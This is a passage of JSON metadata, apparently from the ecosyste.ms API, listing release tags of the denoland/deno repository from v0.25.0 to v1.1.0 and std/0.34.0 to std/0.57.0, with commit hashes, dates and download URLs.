/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl"